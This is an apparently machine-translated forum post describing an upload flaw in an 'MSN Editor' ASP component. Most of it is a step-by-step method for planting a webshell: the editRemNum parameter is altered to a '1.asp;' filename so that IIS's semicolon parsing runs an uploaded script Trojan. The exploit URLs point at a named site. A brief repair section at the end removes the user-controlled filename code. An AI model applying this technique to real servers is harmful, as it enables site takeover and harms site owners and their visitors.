MSN Editor Vulnerability

From:Http://www.idying.cn/

This editor is quite simple. In the afternoon, I met a website. There was no database backup, and there was nothing I could do to directly upload webshell. It was just a single editor interface.

Let's briefly describe the method used.
After you Click Upload, the upload page is displayed. The address is

Http://www.bkjia.com/admin/uploadPic.asp? Language = & editImageNum = 0 & editRemNum=

After being uploaded with a normal image, the address is

Remember the path at this time

When you click upload, the address becomes
Http://www.bkjia.com/news/admin/uploadPic.asp? Language = & editImageNum = 1 & editRemNum = 41513102009204012

 

Obviously. The image address is generated based on the number following the RemNum.

Modify the data after RemNum to 1.asp; 41513102009204012 using the parsing vulnerability of IIS.

The address below.

Http://www.bkjia.com/admin/uploadPic.asp? Language = & editImageNum = 0 & editRemNum = 1.asp; 41513102009204012

Then open

Select your script Trojan to upload

The following address is returned.
Uppic/1.asp0000000013102009204012_2.gif

Then open our pony address directly!

Add the repair method!

By: You want to block the wall

Key code:

If editRemNum <> "" then
RemNum = editRemNum
Else
Randomize
RemNum = Int (999-1 + 1) * Rnd + 1) & day (date) & month (date) & year (date) & hour (time) & minute (time) & second (time)
End if
RemFileName = remNum & "_" & (editImageNum + 1) & ". gif"
End if

Well, I will not explain it first.

Remove the custom part and leave the parameter immediately.

Reserved code:

Randomize
RemNum = Int (999-1 + 1) * Rnd + 1) & day (date) & month (date) & year (date) & hour (time) & minute (time) & second (time)
End if
RemFileName = remNum & "_" & (editImageNum + 1) & ". gif"